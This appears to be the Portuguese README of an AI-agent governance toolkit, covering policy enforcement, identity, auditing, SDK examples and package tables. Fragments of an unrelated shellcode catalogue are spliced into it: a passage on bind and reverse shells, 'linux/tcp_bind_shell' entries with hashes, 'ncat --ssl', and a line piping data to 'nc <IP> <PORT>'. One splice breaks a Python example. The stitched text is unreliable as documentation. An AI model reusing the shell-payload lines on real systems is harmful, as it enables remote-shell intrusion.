
Aplicação de políticas, identidade de confiança zero, sandbox de execução e registro de auditoria para agentes autônomos de IA. Cobre 10/10 do OWASP Agentic Top 10 com governança determinística e de falha fechada.
🚀 Início Rápido · 📋 Especificações · 📦 PyPI · 📝 Registro de Alterações
[!IMPORTANT] Visualização Pública -- versões de visualização pública com qualidade de produção. Pode haver alterações significativas antes da GA (Disponibilidade Geral).
Aplicação de políticas, identidade, isolamento (sandbox) e SRE para agentes de IA autônomos. Um pip install, qualquer framework.
Seus agentes de IA chamam ferramentas, navegam na web, consultam bancos de dados e delegam para outros agentes. Uma vez implantados, eles tomam decisões de forma autônoma. Você precisa de respostas para três perguntas:
1. Essa ação é permitida? Um agente com acesso a send_email e query_database não deveria ser capaz de drop_table. Escopos OAuth e funções IAM controlam quais serviços um agente pode alcançar, não o que ele faz uma vez conectado.
2. Qual agente fez isso? Em um sistema multiagente, cinco agentes podem compartilhar uma única chave de API. Quando algo dá errado, "um agente fez isso" não é uma resposta de incidente.
3. Você consegue provar o que aconteceu? Auditores e órgãos reguladores precisam de registros à prova de adulteração de cada decisão: qual política estava ativa, o que o agente solicitou e por que foi permitido ou negado.
Segurança no nível do prompt ("por favor, siga as regras") não é uma superfície de controle. É um pedido educado a um sistema estocástico. O OWASP LLM01:2025 afirma isso explicitamente: "não está claro se existem métodos infalíveis de prevenção para injeção de prompt." Os números publicados corroboram isso. Andriushchenko et al. (ICLR 2025) relatam uma taxa de sucesso de ataque de 100% no GPT-4o, GPT-3.5, Claude 3 e Llama-3 usando ataques adaptativos com acesso a logprob e otimização de sufixo, avaliados no benchmark JailbreakBench (Chao et al., NeurIPS 2024). O próprio AI Red Teaming Agent da Microsoft formaliza a Taxa de Sucesso de Ataque (ASR), a taxa de violações de política sob entrada adversária, como a métrica canônica para essa classe de falha. Lessons from Red Teaming 100 Generative AI Products reforça o ponto: "as mitigações não eliminam o risco por completo" e o red teaming deve ser um processo contínuo porque as defesas no nível do modelo são probabilísticas por construção.
O AGT não tenta vencer essa batalha dentro do prompt. Cada chamada de ferramenta, envio de mensagem e delegação é interceptado no código da aplicação determinística antes que a intenção do modelo chegue à rede. As ações que o kernel do AGT nega não são "improváveis". Elas são estruturalmente impossíveis. Essa é a diferença entre pedir que um agente se comporte bem e torná-lo incapaz de se comportar mal.
Pré-requisitos: Python 3.10+```bash pip install agent-governance-toolkit[full]
Para o Claude Code, adicione o AGT como um marketplace de plugins e instale o plugin de governança:```text
/plugin marketplace add microsoft/agent-governance-toolkit
/plugin install agt-governance@agent-governance-toolkit
Governar qualquer função de ferramenta em duas linhas:```python from agentmesh.governance import govern
safe_tool = govern(my_tool, policy="policy.yaml") # every call checked, logged, enforced
É isso. O `safe_tool` avalia sua política YAML em cada chamada, registra a decisão e levanta `GovernanceDenied` se a ação for bloqueada.```yaml
# policy.yaml
apiVersion: governance.toolkit/v1
name: production-policy
default_action: allow
rules:
- name: block-destructive
condition: "action.type in ['drop', 'delete', 'truncate']"
action: deny
description: "Destructive operations require human approval"
- name: require-approval-for-send
condition: "action.type == 'send_email'"
action: require_approval
approvers: ["security-team"]
Notas:
☑️ - Testado | 🤖 - Ações automatizadas | ⚠️ - Depende de binário de terceiros
- não testado
Bind shells são uma parte essencial da maioria dos vetores de ataque de bind shell. Como o nome sugere, o código de bind shell abre uma porta de ligação e escuta conexões de entrada, oferecendo uma conexão de shell. Esta seção inclui reverse shells como arquivos separados, mas também shells universais que incorporam tanto os atos de associar o shell a uma porta quanto conectar de volta ao IP de origem.
assembly - linux/tcp_bind_shell
2e0aeb2e8a481e45470b55e47d0ea9c64e8acc98e92c64d6ace79f294a273bc2assembly - linux/tls_bind_shell
ncat --ssl47e9bb4d1a9a053d8b72f2b18c4604e2dc26b1ef3ff2079e6c9de3e89dfd41acsafe_tool(action="read", table="users") {'table': 'users', 'rows': 42}
safe_tool(action="drop", table="users") GovernanceDenied: Action denied by policy rule 'block-destructive': Destructive operations require human approval
Ou use a API `PolicyEvaluator` completa para controle programático:
<details>
<summary><b>PolicyEvaluator exemplo</b></summary>```python
from agent_os.policies import (
PolicyEvaluator, PolicyDocument, PolicyRule,
PolicyCondition, PolicyAction, PolicyOperator, PolicyDefaults
)
evaluator = PolicyEvaluator(policies=[PolicyDocument(
name="my-policy", version="1.0",
defaults=PolicyDefaults(action=PolicyAction.ALLOW),
rules=[PolicyRule(
name="block-dangerous-tools",
condition=PolicyCondition(
field="tool_name",
operator=PolicyOperator.IN,
value=["execute_code", "delete_file"]
),
action=PolicyAction.DENY, priority=100,
)],
)])
result = evaluator.evaluate({"tool_name": "web_search"}) # Allowed
result = evaluator.evaluate({"tool_name": "delete_file"}) # Blocked
TypeScript```typescript import { PolicyEngine } from "@microsoft/agent-governance-sdk";
const engine = new PolicyEngine([ { action: "web_search", effect: "allow" }, { action: "shell_exec", effect: "deny" }, ]); engine.evaluate("web_search"); // "allow" engine.evaluate("shell_exec"); // "deny"
**.NET**```csharp
using AgentGovernance;
using AgentGovernance.Extensions.ModelContextProtocol;
using AgentGovernance.Policy;
var kernel = new GovernanceKernel(new GovernanceOptions
{
PolicyPaths = new() { "policies/default.yaml" },
});
var result = kernel.EvaluateToolCall("did:mesh:agent-1", "web_search",
new() { ["query"] = "latest AI news" });
// MCP server integration
builder.Services.AddMcpServer()
.WithGovernance(options => options.PolicyPaths.Add("policies/mcp.yaml"));
Rust```rust use agent_governance::{AgentMeshClient, ClientOptions};
let client = AgentMeshClient::new("my-agent").unwrap(); let result = client.execute_with_governance("data.read", None); assert!(result.allowed);
**Go**```go
import agentmesh "github.com/microsoft/agent-governance-toolkit/agent-governance-golang"
client, _ := agentmesh.NewClient("my-agent",
agentmesh.WithPolicyRules([]agentmesh.PolicyRule{
{Action: "data.read", Effect: agentmesh.Allow},
{Action: "*", Effect: agentmesh.Deny},
}),
)
result := client.ExecuteWithGovernance("data.read", nil)
Ferramentas CLI:```bash agt doctor # check installation agt verify # OWASP compliance check agt verify --evidence ./agt-evidence.json --strict # fail CI on weak evidence agt red-team scan ./prompts/ --min-grade B # prompt injection audit agt lint-policy policies/ # validate policy files
Guia completo: [quickstart.md](https://github.com/microsoft/agent-governance-toolkit/blob/main/docs/quickstart.md) -- do zero a agentes governados em 5 minutos.
🌍 Também em: [Japonês](https://github.com/microsoft/agent-governance-toolkit/blob/main/docs/i18n/quickstart.ja.md) | [Chinês Simplificado](https://github.com/microsoft/agent-governance-toolkit/blob/main/docs/i18n/quickstart.zh-CN.md) | [Coreano](https://github.com/microsoft/agent-governance-toolkit/blob/main/docs/i18n/quickstart.ko.md)
---
## Como Funciona```
Agent ──► Policy Engine ──► Identity ──► Audit Log
(YAML/OPA/Cedar) (SPIFFE/DID/mTLS) (Tamper-evident)
│ │
├── Allowed ──► Tool executes │
└── Denied ──► GovernanceDenied │
▼
Decision Record
Cada camada é opcional. Comece com govern() e adicione camadas à medida que seu perfil de risco cresce. A maioria das equipes utiliza aplicação de políticas + logs de auditoria e nunca precisa da pilha completa.
Todos os cinco SDKs de linguagem implementam governança principal (política, identidade, confiança, auditoria). Python possui a pilha completa. Copilot CLI e Claude Code são superfícies de desenvolvedor primárias construídas sobre o SDK TypeScript. Veja a Matriz de Pacotes por Linguagem para cobertura detalhada por linguagem.
A partir da v4.1.0, 45 pacotes foram consolidados em 5 distribuições de nível superior:
AZURE_CLIENT_ID, AZURE_TENANT_ID, AZURE_CLIENT_SECRET para funcionalidades integradas ao AzureLista completa: Integrações de Framework · Exemplos de Início Rápido
Cada componente principal possui uma especificação formal RFC 2119 com testes de conformidade. Essas especificações definem o contrato comportamental: o que as implementações DEVEM, DEVEM RECOMENDAR e PODEM fazer.
992 testes de conformidade garantem que o código permaneça alinhado às especificações. 29 Registros de Decisão de Arquitetura documentam o porquê.
O AGT aplica governança na camada de middleware da aplicação, não no nível do kernel do SO. O mecanismo de políticas e os agentes compartilham o mesmo limite de processo.
Recomendação para produção: Execute cada agente em um contêiner separado para isolamento em nível de SO. Veja Arquitetura: Limites de Segurança.
| Ferramenta | Cobertura |
|---|---|
| CodeQL | SAST Python + TypeScript |
| Gitleaks | Varredura de segredos em PR/push/semanal |
Veja Limitações Conhecidas para limites de design honestos e defesa em camadas recomendada.
Guia de Contribuição · Comunidade · Discord · Política de Segurança · Changelog
Usando o AGT? Adicione sua organização em ADOTANTES.md.
Se você usar o Agent Governance Toolkit para construir aplicações que operam com frameworks ou serviços de agentes de terceiros, faça isso por sua própria conta e risco. Recomendamos revisar todos os dados compartilhados com serviços de terceiros e estar ciente das práticas de terceiros em relação à retenção e localização dos dados.
As únicas fontes oficiais do Agent Governance Toolkit são:
A equipe do projeto não mantém nem endossa quaisquer sites, pacotes ou sites de documentação de terceiros que afirmam ser oficiais. Se você encontrar um site ou pacote suspeito usando o nome Agent Governance Toolkit, denuncie através dos canais descritos em SECURITY.md.
Este projeto está licenciado sob a licença MIT.
Este projeto pode conter marcas registradas ou logotipos de projetos, produtos ou serviços. O uso autorizado de marcas registradas ou logotipos da Microsoft está sujeito e deve seguir as Diretrizes de Marcas Registradas e Marca da Microsoft. O uso de marcas registradas ou logotipos da Microsoft em versões modificadas deste projeto não deve causar confusão ou implicar patrocínio da Microsoft. Qualquer uso de marcas registradas ou logotipos de terceiros está sujeito às políticas desses terceiros.
assembly - linux/tcp_bind_shell
21e992297e4627f0e81c7dc7c55f0b0aa8d39c981376a3b6e4938f4a265c9f9aassembly - linux/tcp_bind_shell
d1f3c12ccd167b55a2fdf74c25fd2ffba1c7a7cda52afbc91a5523793b05e3ffassembly - linux/tcp_bind_shell
42ab2e33d8cfde85a3ac12e49190d097ea94f2878c56dfa0a10dccebbd8eb5b9assembly - linux/universal_shell
{ echo -ne "<BN>" ; cat ; } | nc <IP> <PORT>; : 0xAA (tcp_bind_shell), 0xBB (tcp_reverse_shell), 0xCC (reuse_connection)| Pacote | Descrição |
|---|
| Agent OS | Mecanismo de políticas, ciclo de vida do agente, portal de governança |
| Agent Control Specification (README) | Runtime de decisão de políticas stateless, determinístico e com falha segura (núcleo Rust) apoiando a camada de política AGT |
| Agent Mesh | Descoberta, roteamento e malha de confiança de agentes |
| Agent Runtime | Sandboxing de execução com quatro anéis de privilégio |
| Agent SRE | Kill switch, monitoramento de SLO, testes de caos |
| Agent Compliance | Verificação OWASP, linting de políticas, verificações de integridade |
| Agent Marketplace | Governança de plugins e pontuação de confiança |
| Agent Lightning | Governança de treinamento RL com penalidades por violação |
| Agent Hypervisor | Auditoria de execução, mecanismo delta, rastreamento de comprometimento em memória, aplicação de lista de negação de comandos |
| Capacidade | Descrição |
|---|
| MCP Security Gateway | Detecção de envenenamento de ferramentas, monitoramento de deriva, typosquatting, varredura de instruções ocultas (Especificação) |
| Shadow AI Discovery | Encontre agentes não registrados em processos, configurações e repositórios (Descoberta) |
| Governance Dashboard | Visibilidade da frota em tempo real para saúde, confiança e conformidade (Painel) |
| PromptDefense Evaluator | Auditoria de injeção de prompt de 12 vetores (Avaliador) |
| Contributor Reputation | Triagem de autores de PR/issue para engenharia social. Ação GitHub reutilizável (Ação) |
| Idioma | Pacote | Comando |
|---|
| Python | agent-governance-toolkit | pip install agent-governance-toolkit[full] |
| TypeScript | @microsoft/agent-governance-sdk | npm install @microsoft/agent-governance-sdk |
| Copilot CLI | @microsoft/agent-governance-copilot-cli | npx @microsoft/agent-governance-copilot-cli install |
| Claude Code | @microsoft/agent-governance-claude-code | claude --plugin-dir ./agent-governance-claude-code |
| OpenCode | @microsoft/agent-governance-opencode | npm install @microsoft/agent-governance-opencode |
| .NET | Microsoft.AgentGovernance | dotnet add package Microsoft.AgentGovernance |
| .NET MCP | Microsoft.AgentGovernance.Extensions.ModelContextProtocol | dotnet add package Microsoft.AgentGovernance.Extensions.ModelContextProtocol |
| Rust | agent-governance | cargo add agent-governance |
| Go | agent-governance-toolkit | go get github.com/microsoft/agent-governance-toolkit/agent-governance-golang |
| Distribuição | PyPI | O que está incluído |
|---|
agent-governance-toolkit-core | agent-governance-toolkit-core | Mecanismo de políticas, modelo de capacidade, auditoria, gateway MCP, identidade zero-trust, pontuação de confiança, pontes A2A/MCP/IATP |
agent-governance-toolkit-runtime | agent-governance-toolkit-runtime | Anéis de privilégio, orquestração de saga, controle de terminação, validação de plano de execução, aplicação de lista de negação de comandos |
agent-governance-toolkit-sre | agent-governance-toolkit-sre | SLOs, orçamentos de erro, engenharia de caos, disjuntores |
agent-governance-toolkit-cli | agent-governance-toolkit-cli | CLI agt, verificação OWASP, verificações de integridade, linting de políticas |
agent-governance-toolkit[full] | agent-governance-toolkit | Meta-pacote que instala todos os acima |
Nomes de pacotes anteriores (agent-os-kernel, agentmesh-platform, agentmesh-runtime, agent-sre, agent-discovery, agent-hypervisor, agentmesh-marketplace, agentmesh-lightning) permanecem instaláveis como pacotes stub que redirecionam para as distribuições consolidadas.
| Framework | Integração |
|---|
| Microsoft Agent Framework | Middleware Nativo |
| Semantic Kernel | Nativo (.NET + Python) |
| AutoGen | Adaptador |
| LangGraph / LangChain | Adaptador |
| CrewAI | Adaptador |
| OpenAI Agents SDK | Middleware |
| Claude Code | Pacote de plugin de governança |
| Google ADK | Adaptador |
| LlamaIndex | Middleware |
| Haystack | Pipeline |
| Mastra | Adaptador |
| Dify | Plugin |
| Azure AI Foundry | Guia de Implantação |
| GitHub Copilot CLI | Instalador de Governança |
| Exemplo | Framework | O que demonstra |
|---|
| openai-agents-governed | OpenAI Agents SDK | Chamadas de ferramentas protegidas por políticas com níveis de confiança |
| crewai-governed | CrewAI | Governança multiagente com políticas baseadas em funções |
| smolagents-governed | HuggingFace smolagents | Governança de agente leve |
| maf-integration | MAF | Integração com Microsoft Agent Framework |
| mcp-trust-verified-server | MCP | Implementação de servidor MCP com verificação de confiança |
| cedarling-governed | Cedar/Cedarling | Integração com mecanismo de políticas Janssen Cedarling |
| governance-dashboard | Streamlit | Painel de visibilidade da frota em tempo real |
| Especificação | Escopo | Testes |
|---|
| Agent OS Policy Engine | Avaliação de políticas, mesclagem de regras, semântica de falha segura | 68 |
| Agent Control Specification | Runtime de política de ponto de intervenção stateless, vereditos, transformação, falha segura | -- |
| AgentMesh Identity and Trust | Credenciais, pontuação de confiança, cadeias de delegação | 135 |
| Agent Hypervisor Execution Control | Anéis de privilégio, orquestração de saga, kill switch | 80 |
| AgentMesh Trust and Coordination | Negociação de confiança entre pares, política em toda a malha | 62 |
| Agent SRE Governance | SLOs, orçamentos de erro, caos, disjuntores | 111 |
| MCP Security Gateway | Envenenamento de ferramentas, detecção de deriva, instruções ocultas | 127 |
| Agent Lightning Fast-Path | Governança de treinamento RL, penalidades por violação | 100 |
| Framework Adapter Contract | 10 integrações de adaptadores, cadeia de interceptadores | 152 |
| Audit and Compliance | Auditoria Merkle, mapeamento de conformidade, BOM de Decisão | 157 |
| AgentMesh Wire Protocol | Formato de mensagem, roteamento, serialização | -- |
| Padrão | Cobertura |
|---|
| OWASP Agentic AI Top 10 | Todas as categorias de risco ASI mapeadas com controles determinísticos |
| NIST AI RMF 1.0 | Alinhamento completo com GOVERN, MAP, MEASURE, MANAGE |
| EU AI Act | Mapeamento de conformidade com evidências automatizadas |
| SOC 2 | Mapeamento de controles com exportação de trilha de auditoria |
| AARM Extended | Todos os requisitos R1–R9 atendidos; verificado em 14 de junho de 2026 |
| ATF | Todos os cinco elementos mapeados: Agent Mesh (identidade), Agent OS (política), Agent Compliance (governança), Agent Runtime (sandboxing), Agent SRE (resposta a incidentes) |
| ClusterFuzzLite | 7 alvos de fuzzing (política, injeção, MCP, sandbox, confiança) |
| Dependabot | 13 ecossistemas |
| OpenSSF Scorecard | Pontuação semanal + upload SARIF |
| Categoria | Links |
|---|
| Primeiros Passos | Guia Rápido · Tutoriais (60+) · FAQ |
| Arquitetura | Design do Sistema · Modelo de Ameaças · ADRs (29) |
| Especificações | Todas as Especificações (10 especificações formais, 992 testes de conformidade) |
| Referência da API | Agent OS · AgentMesh · Agent SRE |
| Conformidade | OWASP · EU AI Act · NIST AI RMF · SOC 2 · AARM Extended · ATF |
| Implantação | Azure · AWS · GCP · Docker Compose |
| Extensões | VS Code · Integrações de Framework |
| Documento | Finalidade |
|---|
| GOVERNANCE.md | Tomada de decisão, funções, escada de contribuidores |
| CHARTER.md | Carta técnica (formato LF Projects) |
| MAINTAINERS.md | Mantenedores e organizações |
| SECURITY.md | Relato de vulnerabilidades e SLAs de resposta |
| CODE_OF_CONDUCT.md | Código de Conduta Open Source da Microsoft |
| ANTITRUST.md | Diretrizes de direito da concorrência para participantes |
| TRADEMARKS.md | Política de uso de marcas registradas |
| Recurso | Localização |
|---|
| Código-fonte | github.com/microsoft/agent-governance-toolkit |
| Documentação | microsoft.github.io/agent-governance-toolkit |
| Pacotes Python | pypi.org/user/agentgovtoolkit |
| Pacotes npm | @microsoft/agent-governance-sdk em npmjs.com |
| Pacotes NuGet | Microsoft.AgentGovernance.* em nuget.org |
| Crates Rust | agent-governance, agent-governance-mcp em crates.io |